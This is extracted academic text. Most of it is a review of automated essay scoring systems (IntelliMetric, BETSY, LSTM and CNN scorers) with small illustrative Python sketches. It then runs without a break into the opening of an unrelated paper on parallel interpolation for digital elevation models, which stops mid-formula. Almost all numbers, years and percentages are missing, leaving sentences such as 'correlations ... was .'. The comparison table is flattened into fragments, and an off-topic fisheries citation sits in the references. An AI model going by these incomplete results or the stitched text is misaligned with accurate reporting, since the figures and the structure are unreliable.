intellimetric relies on a combination of artificial intelligence (ai), natural language processing (nlp) techniques, and statistical techniques. it uses cognisearch and quantum reasoning technologies that were designed to enable intellimetric to understand natural language in order to support essay scoring (dikli, ). intellimetric uses three steps to score essays, as follows:
a) first, the training step provides the system with essays of known scores.
b) second, the validation step examines the scoring model against a smaller set of essays with known scores.
c) finally, the application step scores new essays with unknown scores (learning, ; learning, ; shermis & barrera, ).
intellimetric identifies text-related characteristics as larger categories called latent semantic dimensions (lsd). (figure ) represents the intellimetric features model. intellimetric scores essays in several languages including english, french, german, arabic, hebrew, portuguese, spanish, dutch, italian, and japanese (elliot, ). according to rudner, garcia, and welch (rudner, garcia & welch, ), the average of the correlations between intellimetric and human-raters was . (refaat, ewees & eisa, ).

my access!

my access is a web-based writing assessment system based on the intellimetric aes system. the primary aim of this system is to provide immediate scoring and diagnostic feedback for students' writings in order to motivate them to improve their writing proficiency on the topic (dikli, ). the my access system contains more than prompts that assist in an immediate analysis of the essay. it can provide personalized spanish and chinese feedback on several genres of writing such as narrative, persuasive, and informative essays. moreover, it provides multilevel feedback (developing, proficient, and advanced) as well (dikli, ; learning, ).

bayesian essay test scoring system tm (betsy)

betsy classifies text based on trained material. it was developed in by lawrence rudner at the university of maryland, college park, with funds from the us department of education (valenti, neri & cucchiarelli, ). it has been designed to automate essay scoring, but it can be applied to any text classification task (taylor, ). betsy needs to be trained on a huge number ( , texts) of human-classified essays to learn how to classify new essays. the goal of the system is to determine the most likely classification of an essay into a set of groups, such as (pass–fail) and (advanced – proficient – basic – below basic) (dikli, ; valenti, neri & cucchiarelli, ). it learns how to classify a new document through the following steps. the first step, word training, is concerned with the training of words, evaluating database statistics, eliminating infrequent words, and determining stop words. the second step, word-pair training, is concerned with evaluating database statistics, eliminating infrequent word pairs, possibly scoring the training set, and trimming misclassified training sets. finally, betsy can be applied to a set of experimental texts to identify the classification precision for several new texts or a single text (dikli, ). betsy has achieved an accuracy of over %, when trained with essays and tested with essays (rudner & liang, ).
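the bayesian classification idea behind betsy can be illustrated with a minimal sketch; what follows is a generic multinomial naive bayes text classifier with made-up training snippets and labels, not betsy's own implementation or corpus:

# Illustrative Bayesian text classification in the spirit of BETSY:
# fit a multinomial naive Bayes model on labelled essays and return the
# most likely category for a new essay (toy data, assumed labels).
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

train_texts = [
    "clear thesis, well organized paragraphs and strong supporting evidence",
    "some structure is present but the argument lacks supporting detail",
    "very short response with frequent grammar errors and no clear point",
    "competent organization and vocabulary with minor mechanical errors",
]
train_labels = ["advanced", "basic", "below basic", "proficient"]

classifier = make_pipeline(CountVectorizer(), MultinomialNB())
classifier.fit(train_texts, train_labels)

print(classifier.predict(["organized essay with relevant evidence and few errors"]))

in practice, a much larger training set would be needed, which is consistent with the large number of pre-scored essays betsy requires.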
automatic featuring aes systems

automatic text scoring using neural networks

alikaniotis, yannakoudakis, and rei introduced in a deep neural network model capable of learning features automatically to score essays. this model introduced a novel method to identify the more discriminative regions of the text using: ( ) a score-specific word embedding (sswe) to represent words and ( ) a two-layer bidirectional long short-term memory (lstm) network to learn essay representations (alikaniotis, yannakoudakis & rei, ; taghipour & ng, ). alikaniotis and his colleagues extended the c&w embeddings model into the augmented c&w model to capture not only the local linguistic environment of each word, but also how each word contributes to the overall score of an essay. in order to capture sswes, a further linear unit was added in the output layer of the previous model which performs linear regression, predicting the essay score (alikaniotis, yannakoudakis & rei, ). figure shows the architectures of the two models, (a) the original c&w model and (b) the augmented c&w model. figure shows an example of (a) standard neural embeddings versus (b) sswe word embeddings. the sswes obtained by their model were used to derive continuous representations for each essay. each essay is identified as a sequence of tokens. the uni- and bi-directional lstms have been efficiently used for embedding long sequences (alikaniotis, yannakoudakis & rei, ). they used the kaggle asap (https://www.kaggle.com/c/asap-aes/data) contest dataset. it consists of essays, with an average length of -to- words per essay, each double-marked (cohen's kappa = . ). the essays covered eight different prompts, each with distinct marking criteria and score range. results showed that the sswe and lstm approach, without any prior knowledge of the language grammar or the text domain, was able to mark the essays in a very human-like way, beating other state-of-the-art systems. furthermore, while tuning the models' hyperparameters on a separate validation set (alikaniotis, yannakoudakis & rei, ), they did not perform any further preprocessing of the text other than simple tokenization. the combination of sswe and lstm also outperformed the traditional svm model; on the contrary, lstm alone did not give significantly better accuracy than svm. according to alikaniotis, yannakoudakis, and rei (alikaniotis, yannakoudakis & rei, ), the combination of sswe with the two-layer bi-directional lstm had the highest correlation value on the test set, averaging . (spearman) and . (pearson).

a neural network approach to automated essay scoring

taghipour and h. t. ng developed in a recurrent neural network (rnn) approach which automatically learns the relation between an essay and its grade. since the system is based on rnns, it can use non-linear neural layers to identify complex patterns in the data and learn them, and encode all the information required for essay evaluation and scoring (taghipour & ng, ).
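the overall shape shared by these recurrent scoring models (word embeddings, a bidirectional lstm over the token sequence, pooling over time, and a single sigmoid unit producing a normalized score) can be sketched as follows; this is our minimal illustration with assumed hyperparameters, not the architecture or code of any of the systems reviewed here:

# Minimal sketch of a recurrent essay-scoring regressor (illustrative only):
# token ids -> word embeddings -> bidirectional LSTM -> mean over time ->
# one sigmoid unit producing a normalized score in [0, 1].
import tensorflow as tf

vocab_size, embed_dim, max_len = 20000, 50, 500    # assumed hyperparameters

model = tf.keras.Sequential([
    tf.keras.layers.Embedding(vocab_size, embed_dim),
    tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(64, return_sequences=True)),
    tf.keras.layers.GlobalAveragePooling1D(),        # mean-over-time pooling
    tf.keras.layers.Dense(1, activation="sigmoid"),  # normalized essay score
])
model.build(input_shape=(None, max_len))
model.compile(optimizer="rmsprop", loss="mse")

in such setups, the gold scores are typically rescaled to [0, 1] for training and mapped back to each prompt's score range before evaluation against the human raters.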
the designed model architecture can be presented in five layers, as follows:
a) the lookup table layer, which builds a dlt-dimensional space containing the projection of each word.
b) the convolution layer, which extracts feature vectors from n-grams. it can possibly capture local contextual dependencies in writing and therefore enhance the performance of the system.
c) the recurrent layer, which processes the input to generate a representation for the given essay.
d) the mean-over-time layer, which aggregates the variable number of inputs into a fixed-length vector.
e) the linear layer with sigmoid activation, which maps the generated output vector from the mean-over-time layer to a scalar value (taghipour & ng, ).
taghipour and his colleagues used the kaggle asap contest dataset. they distributed the data set into a % training set, a % development set, and a % testing set. they used quadratic weighted kappa (qwk) as an evaluation metric. to evaluate the performance of the system, they compared it to an available open-source aes system called the 'enhanced ai scoring engine' (ease) (https://github.com/edx/ease). to identify the best model, they performed several experiments, such as convolutional vs. recurrent neural network, basic rnn vs. gated recurrent units (gru) vs. lstm, unidirectional vs. bidirectional lstm, and with vs. without the mean-over-time layer (taghipour & ng, ). the results showed multiple observations according to (taghipour & ng, ), summarized as follows:
a) rnn failed to get results as accurate as lstm or gru, and the other models outperformed it. this was possibly due to the relatively long sequences of words in writing.
b) the neural network performance was significantly affected by the absence of the mean-over-time layer. as a result, it did not learn the task properly.
c) the best model was the combination of ten instances of lstm models with ten instances of cnn models. the new model outperformed the baseline ease system by . % and achieved an averaged qwk value of . .

automatic features for essay scoring—an empirical study

dong and zhang provided in an empirical study to examine a neural network method that learns syntactic and semantic characteristics automatically for aes, without the need for external pre-processing. they built a hierarchical convolutional neural network (cnn) structure with two levels in order to model sentences separately (dasgupta et al., ; dong & zhang, ). dong and his colleague built a model with two parts, summarized as follows:
a) word representations: a word embedding is used, but it does not rely on pos-tagging or other pre-processing.
b) cnn model: they took essay scoring as a regression task and employed a two-layer cnn model, in which one convolutional layer is used to extract sentence representations, and the other is stacked on sentence vectors to learn essay representations.
the dataset that they employed in the experiments is the kaggle asap contest dataset. the settings of data preparation followed those that phandi, chai, and ng used (phandi, chai & ng, ). for the domain adaptation (cross-domain) experiments, they followed phandi, chai, and ng (phandi, chai & ng, ) by picking four pairs of essay prompts, namely → , → , → and → , where → denotes prompt one as the source domain and prompt as the target domain.
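the studies in this category report agreement with the human raters as quadratic weighted kappa; the following minimal sketch shows one common way to compute qwk for integer score labels (our illustration with toy scores, not the evaluation code used in these studies):

# Illustrative quadratic weighted kappa (QWK) between two integer score vectors.
import numpy as np

def quadratic_weighted_kappa(human, system, min_score, max_score):
    n = max_score - min_score + 1
    observed = np.zeros((n, n))
    for h, s in zip(human, system):
        observed[h - min_score, s - min_score] += 1          # confusion matrix
    # expected matrix from the marginal score distributions of both raters
    expected = np.outer(observed.sum(axis=1), observed.sum(axis=0)) / observed.sum()
    scores = np.arange(n)
    weights = (scores[:, None] - scores[None, :]) ** 2 / (n - 1) ** 2
    return 1.0 - (weights * observed).sum() / (weights * expected).sum()

# toy example: two raters agree on three of four essays scored on a 0-4 scale
print(quadratic_weighted_kappa([2, 4, 4, 3], [2, 4, 3, 3], min_score=0, max_score=4))

qwk penalizes large disagreements quadratically, so it rewards systems whose errors stay close to the human score rather than merely matching it exactly.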
they used quadratic weighted kappa (qwk) as the evaluation metric. in order to evaluate the performance of the system, they compared it to the ease system (an open-source aes available to the public) with both of its models, bayesian linear ridge regression (blrr) and support vector regression (svr). the empirical results showed that the two-layer convolutional neural network (cnn) outperformed the other baselines (e.g., bayesian linear ridge regression) on both the in-domain and domain adaptation experiments on the kaggle asap contest dataset. so, the neural features learned by the cnn were very effective in essay marking, handling more high-level and abstract information compared to manual feature templates. the in-domain average qwk value was . vs. . for the human rater (dong & zhang, ).

augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring

in , dasgupta et al. ( ) proposed a qualitatively enhanced deep convolution recurrent neural network architecture to score essays automatically. the model considers both word- and sentence-level representations. using a hierarchical cnn connected with a bidirectional lstm model, they were able to consider linguistic, psychological, and cognitive feature embeddings within a text (dasgupta et al., ). the designed model architecture for the linguistically informed convolution rnn can be presented in five layers, as follows:
a) generating embeddings layer: the primary function is constructing previously trained sentence vectors. sentence vectors extracted from every input essay are appended with the vector formed from the linguistic features determined for that sentence.
b) convolution layer: for a given sequence of vectors with k windows, this layer's function is to apply a linear transformation over all these k windows. this layer is fed by each of the generated word embeddings from the previous layer.
c) long short-term memory layer: the main function of this layer is to examine the future and past sequence context by connecting bidirectional lstm (bi-lstm) networks.
d) activation layer: the main function of this layer is to obtain the intermediate hidden states h1, h2, ..., ht from the bi-lstm layer in order to calculate the weights of each sentence's contribution to the final essay score (quality of essay). they used an attention pooling layer over sentence representations.
e) the sigmoid activation function layer: the main function of this layer is to perform a linear transformation of the input vector that converts it to a scalar (continuous) value (dasgupta et al., ).
figure represents the proposed linguistically informed convolution recurrent neural network architecture. dasgupta and his colleagues employed the kaggle asap contest dataset in their experiments. they assessed their models using cross-validation over several folds; every fold is distributed as follows: a training set which represents % of the data, a development set represented by %, and the rest ( %) as the test set. they used quadratic weighted kappa (qwk) as the evaluation metric. the results showed that, in terms of all these parameters, the qualitatively enhanced deep convolution lstm (qe-c-lstm) system performed better than the existing lstm, bi-lstm, and ease models. it achieved a pearson's and spearman's correlation of . and . respectively, as compared to that of . and . in alikaniotis, yannakoudakis & rei ( ).
they also accomplished an rmse score of . . they computed a pairwise cohen’s k value of . as well (dasgupta et al., ). summary and discussion over the past four decades, there have been several studies that examined the approaches of applying computer technologies on scoring essay questions. recently, computer hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the proposed linguistically informed convolution recurrent neural network architecture. full-size doi: . /peerjcs. /fig- technologies have been able to assess the quality of writing using aes technology. many attempts have taken place in developing aes systems in the past years (dikli, ). the aes systems do not assess the intrinsic qualities of an essay directly as human-raters do, but they utilize the correlation coefficients of the intrinsic qualities to predict the score to be assigned to an essay. the performance of these systems is evaluated based on the comparison of the scores assigned to a set of essays scored by expert humans. the aes systems have many strengths mainly in reducing labor-intensive marking activities, overcoming time, cost, and improving the reliability of writing tasks. besides, they ensure a consistent application of marking criteria, therefore facilitating equity in scoring. however, there is a substantial manual effort involved in reaching these results on different domains, genres, prompts, and so forth. moreover, the linguistic features intended to capture the aspects of writing to be assessed are hand-selected and tuned for specific domains. in order to perform well on different data, separate models with distinct feature sets are typically tuned (burstein, ; dikli, ; hamp-lyons, ; rudner & gagne, ; rudner & liang, ). despite its weaknesses, the aes systems continue to attract the attention of public schools, universities, testing agencies, researchers and educators (dikli, ). the aes systems described in this paper under the first category are based on handcrafted features and, usually, rely on regression methods. they employ several methods to obtain the scores. while e-rater and intellimetric use nlp techniques, the iea system utilizes lsa. moreover, peg utilizes proxy measures (proxes), and betsytm uses bayesian procedures to evaluate the quality of a text. while e-rater, intellimetric, and betsy evaluate style and semantic content of essays, peg only evaluates style and ignores the semantic aspect of essays. furthermore, iea is exclusively concerned with semantic content. unlike peg, e-rater, intellimetric, and iea hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. need smaller numbers of pre-scored essays for training in contrast with betsy which needs a huge number of training pre-scored essays. the systems in the first category have high correlations with human-raters. while peg, e-rater, iea, and betsy evaluate only english language essay responses, intellimetric evaluates essay responses in multiple languages. contrary to peg, iea, and betsy, e-rater, and intellimetric have instructional or immediate feedback applications (i.e., criterion and my access!). instructional-based aes systems have worked hard to provide formative assessments by allowing students to save their writing drafts on the system. thus, students can review their writings as of the formative feedback received from either the system or the teacher. 
the recent version of my access! ( . ) provides online portfolios and peer review. the drawbacks of this category may include the following: (a) feature engineering can be time-consuming, since features need to be carefully handcrafted and selected to fit the appropriate model, and (b) such systems are sparse and instantiated by discrete pattern-matching. aes systems described in this paper under the second category are usually based on neural networks. neural networking approaches, especially deep learning techniques, have been shown to be capable of inducing dense syntactic and semantic features automatically, applying them to text analysis and classification problems including aes systems (alikaniotis, yannakoudakis & rei, ; dong & zhang, ; taghipour & ng, ), and giving better results with regards to the statistical models used in the handcrafted features (dong & zhang, ). recent advances in deep learning have shown that neural approaches to aes achieve state-of-the-art results (alikaniotis, yannakoudakis & rei, ; taghipour & ng, ) with the additional advantage of utilizing features that are automatically learned from the data. in order to facilitate interpretability of neural models, a number of visualization techniques have been proposed to identify textual (superficial) features that contribute to model performance [ ]. while alikaniotis and his colleagues ( ) employed a two-layer bidirectional lstm combined with the sswe for essay scoring tasks, taghipour & ng ( ) adopted the lstm model and combined it with cnn. dong & zhang ( ) developed a two-layer cnn, and dasgupta and his colleagues ( ) proposed a qualitatively enhanced deep convolution lstm. unlike alikaniotis and his colleagues ( ), taghipour & ng ( ), dong & zhang ( ), dasgupta and his colleagues ( ) were interested in word-level and sentence-level representations as well as linguistic, cognitive and psychological feature embeddings. all linguistic and qualitative features were figured off-line and then entered in the deep learning architecture. although deep learning-based approaches have achieved better performance than the previous approaches, the performance may not be better using the complex linguistic and cognitive characteristics, which are very important in modeling such essays. see table for the comparison of aes systems. in general, there are three primary challenges to aes systems. first, they are not able to assess essays as human-raters do because they do what they have been programmed to do hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the comparison of aes systems. aes/parameter vendor release date primary focus technique(s) used training data feedback applica- tion correlation with human raters’ scores pegtm ellis page style statistical yes ( – ) no . ieatm landauer, foltz, & laham content lsa (kat en- gine by pear- son) yes (∼ ) yes . e-rater r© ets development team style & content nlp yes (∼ ) yes (crite- rion) ∼ . intellimetrictm vantage learning style & content nlp yes (∼ ) yes (my access!) ∼ . betsytm rudner style & content bayesian text classification yes ( ) no ∼ . alikaniotis, yan- nakoudakis & rei ( ) alikaniotis, yan- nakoudakis, and rei style & content sswe + two- layer bi-lstm yes (∼ ) no ∼ . (spear- man)∼ . (pearson) taghipour & ng ( ) taghipour and ng style & content adopted lstm yes (∼ ) no qwk for lstm ∼ . 
dong & zhang ( ) dong and zhang syntactic and seman- tic features word embed- ding and a two- layer convo- lution neural network yes (∼ to ∼ ) no average kappa ∼ . versus . for hu- man dasgupta et al. ( ) dasgupta, t., naskar, a., dey, l., & saha, r. style, content, lin- guistic and psycho- logical deep convolu- tion recurrent neural network yes ( ∼ to ) no pearson’s and spearman’s correlation of . and . respectively notes. scorers. (page, ). they eliminate the human element in writing assessment and lack the sense of the rater as a person (hamp-lyons, ). this shortcoming was somehow overcome by obtaining high correlations between the computer and human-raters (page, ) although this is still a challenge. the second challenge is whether the computer can be fooled by students or not (dikli, ). it is likely to ‘‘trick’’ the system by writing a longer essay to obtain higher score for example (kukich, ). studies, such as the gre study in , examined whether a computer could be deceived and assign a lower or higher score to an essay than it should deserve or not. the results revealed that it might reward a poor essay (dikli, ). the developers of aes systems have been utilizing algorithms to detect students who try to cheat. although automatic learning aes systems based on neural networks algorithms, the handcrafted aes systems transcend automatic learning systems in one important feature. handcrafted systems are highly related to the scoring rubrics that have been designed as a criterion for assessing a specific essay and human-raters use these rubrics to score essays hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a well. the objectivity of human-raters is measured by their commitment to the scoring rubrics. on the contrary, automatic learning systems extract the scoring criteria using machine learning and neural networks, which may include some factors that are not part of the scoring rubric, and, hence, is reminiscent of raters’ subjectivity (i.e., mode, nature of a rater’s character, etc.) considering this point, handcrafted aes systems may be considered as more objective and fairer to students from the viewpoint of educational assessment. the third challenge is measuring the creativity of human writing. accessing the creativity of ideas and propositions and evaluating their practicality are still a pending challenge to both categories of aes systems which still needs further research. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • mohamed abdellatif hussein conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. • hesham hassan and mohammad nassef authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: as this is a literature, review, there was no raw data. references alikaniotis d, yannakoudakis h, rei m. . automatic text scoring using neural net- works. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers). stroudsburg: association for computational linguistics, – doi . /v /p - . attali y, burstein j. . automated essay scoring with e-rater r© v. . . ets research report series ( ):i– doi . /j. - . .tb .x. burstein j. . 
the e-rater scoring engine: automated essay scoring with natural language processing. in: shermis md, burstein j, eds. automated essay scoring: a cross-disciplinary approach. mahwah: lawrence erlbaum associates, – . crozier ww, kennedy gja. . marine exploitation of atlantic salmon (salmo salar l.) from the river bush, northern ireland. fisheries research ( – ): – doi . / - ( ) - . hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /v /p - http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. dasgupta t, naskar a, saha r, dey l. . augmenting textual qualitative features in deep convolution recurrent neural network for automatic essay scoring. in: proceed- ings of the th workshop on natural language processing techniques for educational applications. melbourne, australia, july , . stroudsburg: association for computational linguistics, – . available at http://aclweb.org/anthology/w - . dikli s. . an overview of automated scoring of essays. the journal of technology, learning, and assessment ( ): – . dong f, zhang y. . automatic features for essay scoring—an empirical study. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – doi . /v /d - . elliot s. . intellimetric: from here to validity. in: automated essay scoring: a cross- disciplinary perspective. – . farag y, yannakoudakis h, briscoe t. . neural automated essay scoring and coherence modeling for adversarially crafted input. in: proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers). association for computational linguistics louisiana, usa, – doi . /v /n - . foltz pw, gilliam s, kendall s. . supporting content-based feedback in on-line writing evaluation with lsa. interactive learning environments ( ): – doi . / - ( ) : ; -b;ft . hamp-lyons l. . fourth generation writing assessement. in: silva t, matsuda pk, eds. on second language writing. vol. . mahwah: lawrence erlbaum, – . home—measurement incorporated. . available at http://www.measurementinc. com/ (accessed on february ). isaacs t, zara c, herbert g, coombs sj, smith c. . key concepts in educa- tional assessment [electronic resource]. thousand oaks: sage publications ltd doi . / . kukich k. . beyond automated essay scoring, the debate on automated essay grading. ieee intelligent systems ( ): – . landauer tk. . automatic essay assessment. assessment in education: principles, policy & practice ( ): – doi . / . learning v. . a true score study of intellimetric accuracy for holistic and dimensional scoring of college entry-level writing program (rb- ). newtown: vantage learning. learning v. . a true score study of th grade student writing responses using intelli- metric version . (rb- ). newtown: vantage learning, . nitko aj, brookhart sm. . educational assessment of students. th edition. new jersey: pearson merrill prentice hall. page eb. . computer grading of student prose, using modern concepts and software. journal of experimental education ( ): – doi . / . . . hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://dx.doi.org/ . /v /d - http://dx.doi.org/ . /v /n - http://dx.doi.org/ . / - ( ) : ; -b;ft http://www.measurementinc.com/ http://www.measurementinc.com/ http://dx.doi.org/ . 
/ http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. page eb. . project essay grade: peg. in: automated essay scoring: a cross-disciplinary perspective. mahwah: lawrence erlbaum associates publishers, – . peng x, ke d, xu b. . automated essay scoring based on finite state transducer: towards asr transcription of oral english speech. in: proceedings of the th annual meeting of the association for computational linguistics: long papers-volume . association for computational linguistics, – . phandi p, chai kma, ng ht. . flexible domain adaptation for automated essay scoring using correlated linear regression. in: proceedings of the conference on empirical methods in natural language processing. lisbon: association for computational linguistics, – doi . /v /d - . ramineni c, williamson d. . understanding mean score differences between the e-rater r© automated scoring engine and humans for demographically based groups in the gre r© general test. ets research report series ( ): – doi . /isie. . . refaat mm, ewees aa, eisa mm. . automated assessment of students’ arabic free- text answers. international journal of intelligent computing and information science ( ): – . rudner l, gagne p. . an overview of three approaches to scoring written essays by computer. practical assessment, research & evaluation ( ). rudner lm, garcia v, welch c. . an evaluation of the intellimetricsm essay scoring system. the journal of technology, learning and assessment ( ): – . rudner lm, liang t. . automated essay scoring using bayes’ theorem. the journal of technology, learning, and assessment ( ): – . shermis md, barrera fd. . exit assessments evaluating writing ability through automated essay scoring. in: annual meeting of the american educational research association, new orleans, la, – . available at https://eric.ed.gov/?id=ed . stecher bm, rahn m, ruby a, alt m, robyn a, ward b. . using alternative assess- ments in vocational education. rand-publications-mr-all series. berkeley: rand and university of california. taghipour k, ng ht. . a neural approach to automated essay scoring. in: proceedings of the conference on empirical methods in natural language pro- cessing. stroudsburg: association for computational linguistics, – doi . /v /d - . taylor ar. . a future in the process of arrival: using computer technologies for the assessment of student learning. kelowna: society for advancement of excellence in education. valenti s, neri f, cucchiarelli a. . an overview of current research on automated essay grading. journal of information technology education: research : – doi . / . williamson dm, xi x, breyer fj. . a framework for evaluation and use of automated scoring. educational measurement: issues and practice ( ): – doi . /j. - . . .x. hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /v /d - http://dx.doi.org/ . /isie. . https://eric.ed.gov/?id=ed http://dx.doi.org/ . /v /d - http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. submitted august accepted february published march corresponding authors guoxiang yang, yanggx@cugb.edu.cn gang mei, gang.mei@cugb.edu.cn academic editor stefan steiniger additional information and declarations can be found on page doi . /peerj-cs. copyright tu et al. distributed under creative commons cc-by . 
open access

comparative investigation of parallel spatial interpolation algorithms for building large-scale digital elevation models

jingzhi tu, guoxiang yang, pian qi, zengyu ding and gang mei
school of engineering and technology, china university of geoscience (beijing), beijing, china

abstract

the building of large-scale digital elevation models (dems) using various interpolation algorithms is one of the key issues in geographic information science. different choices of interpolation algorithms may trigger significant differences in interpolation accuracy and computational efficiency, and a proper interpolation algorithm needs to be carefully used based on the specific characteristics of the scene of interpolation. in this paper, we comparatively investigate the performance of parallel radial basis function (rbf)-based, moving least square (mls)-based, and shepard's interpolation algorithms for building dems by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. the drawn conclusions may help select a suitable interpolation algorithm in a specific scene to build large-scale dems.

subjects distributed and parallel computing, spatial and geographic information systems
keywords digital elevation model (dem), spatial interpolation, radial basis function (rbf), moving least square (mls), parallel algorithm, graphics processing unit (gpu), geographic information system (gis)

introduction

a digital elevation model (dem) is a numerical representation of topography made up of equal-sized grid cells, each with a value of elevation. one of the most important scientific challenges of digital elevation modeling is the inefficiency of most interpolation algorithms in dealing with the large amount of data produced by a large-scale dem with a fine resolution. to solve the problem, one of the common strategies is to parallelize interpolation algorithms on various high performance computing (hpc) platforms. for different large-scale dems, different parallel spatial interpolation algorithms are usually specifically selected, because a variety of spatial interpolation algorithms exist that behave differently for different data configurations and landscape conditions. consequently, the accuracy of a dem is sensitive to the interpolation technique, and it is important to understand how the various algorithms affect a dem. therefore, this study is conducted. spatial interpolation is a category of important algorithms in the field of geographic information. siu-ngan lam ( ) provided a review of various interpolation algorithms, including most distance-weighting methods, kriging, spline interpolation, interpolating polynomials, finite-difference methods, power-series trend models, fourier models, distance-weighted least-squares, and least-squares fitting with splines.
many spatial interpolation algorithms are used to build dems, for example, the shepard’s method (idw) (shepard, ), the kriging method (krige, ), the discrete smoothing interpolation (dsi) method (mallet, ), the radial basis function (rbf)-based method (powell, ), and the moving least squares (mls)-based method (lancaster & salkauskas, ). much research work (gumus & sen, ; chaplot et al., ; aguilar et al., ; khairnar et al., ; polat, uysal & toprak, ; rishikeshan et al., ) has been conducted to evaluate the effects of different interpolation methods on the precision of dem interpolation. in the comparative investigation of spatial interpolation algorithms for building dems, quite a few studies specifically focused on the impact of data samples and terrain types on interpolation accuracy; among them, gumus & sen ( ) compared the accuracy of various interpolation methods at different point distributions, the interpolation performance of idw is worse than other algorithms for the same data distribution. for the same algorithm, in the case of using all points and grid, their experimental results show that the best interpolation performances are modified shepard’s (ms) for random distribution; multiquadric radial basis function (mrbf) for curvature distribution, and inverse distance weighted (idw) for uniform distribution. chaplot et al. ( ) and aguilar et al. ( ) evaluated the effects of landform types and the density of the original data on the accuracy of dem production, their results show that interpolation algorithms perform well at higher sampling densities, and mrbf provided significantly better interpolation than idw in rough or non-uniform terrain. at lower sampling densities, when the spatial structure of height was strong, kriging yielded better estimates. when the spatial structure of height was weak, idw and regularized spline with tension (rst) performed better. on the other hand, mrbf performed well in the mountainous areas and ordinary kriging (ok) was the best for multi-scales interpolations in the smooth landscape. in addition, zhang ( ) established a descriptive model of local terrain features to study the correlation of surface roughness indicators and spatial distribution indicators for dem interpolation algorithms. (chaplot et al., ). ghandehari, buttenfield & farmer ( ) illustrated that the bi-quadratic and bi- cubic interpolation methods outperform weighted average, linear, and bi-linear methods at coarse resolutions and in rough or non-uniform terrain. aguilar et al. ( ) pointed out that mrbf is better than multilog function for low sample densities and steeper terrain. with the increasing size of dems, it is increasingly necessary to design parallel solutions for existing sequential algorithms to speed up processing. when adopting an interpolation method to deal with a large dem, the computational cost would be quite expensive, and the computational efficiency would especially be unsatisfied. the techniques in hpc are widely used to improve computational efficiency in various science and engineering applications such as surface modeling (yan et al., ), spatial point pattern analysis (zhang, zhu & huang, ), urban growth simulation (guan et al., ), delaunay triangulation (dt) for gis (coll & guerrieri, ), spatial tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
interpolation (wang, guan & wu, ; cheng, ; mei, ; mei, xu & xu, ; mei, ; mei, xu & xu, ; ding et al., b), and image processing (wasza et al., ; lei et al., ; yin et al., ; wu, deng & jeon, ). one of the effective strategies to solve the problem is to perform the dem interpolation in parallel on various parallel computing platforms such as shared-memory computers, distributed-memory computers, or even clusters. the parallelization of dem interpolation can be developed with the computational power of modern multicore central processing units (cpus) and many-core graphics processing units (gpus). for example, zhou et al. ( ) proposed a parallel open multi-processing (openmp)- and message passing interface (mpi)-based implementation of the priority-flood algorithm that identifies and fills depressions in raster dems. yan et al. ( ) accelerated high-accuracy surface modeling (hasm) in constructing large-scale and fine resolution dem surfaces by the use of gpus and applied this acceleration algorithm to simulations of both ideal gaussian synthetic surfaces and real topographic surfaces in the loess plateau of gansu province. tan et al. ( ) presented a novel method to generate contour lines from grid dem data, based on the programmable gpu pipeline, that can be easily integrated into a d gis system. chen et al. ( ) demonstrated a new algorithm for reconstructing contour maps from raster dem data for digital-earth and other terrain platforms in real-time entirely based on modern gpus and programmable pipelines. the rbf, kriging, mls and shepard’s interpolation algorithms are the most frequently used spatial interpolation algorithms, among which, the kriging method can be regarded as an instance of rbf framework (peng et al., ). therefore, in this paper, we comparatively investigate the performance of the rbf-based, mls-based, and shepard’s interpolation algorithms for building dems by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. the rest of the paper is organized as follows. ‘background’ briefly introduces the basic principles of eight interpolation methods. ‘methods’ concentrates mainly on our parallel implementations of the eight interpolation methods and creation of the testing data. ‘results’ introduces some of the experimental tests performed on the cpu and gpu. ‘discussion’ discusses the experimental results. finally, ‘conclusion’ states conclusions from the work. background in this section, we briefly introduce eight spatial interpolation algorithms. mls-based interpolation algorithms the mls method obtains the fitting surface by solving the equation group derived from minimizing the sum of the squares of the errors between the fitting data and the given node data. original mls interpolation algorithm the mls approximation is used to approximate field variables and their derivatives. in a domain �, the mls approximation f h(x) of the field variable f (x) in the vicinity of a tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. point x̄ is given as f h(x)= m∑ j= pj(x)·aj(x̄)=p t (x)·a(x̄) ( ) where pj(x),j = , ,...,m is a complete basis function with coefficients aj(x̄). 
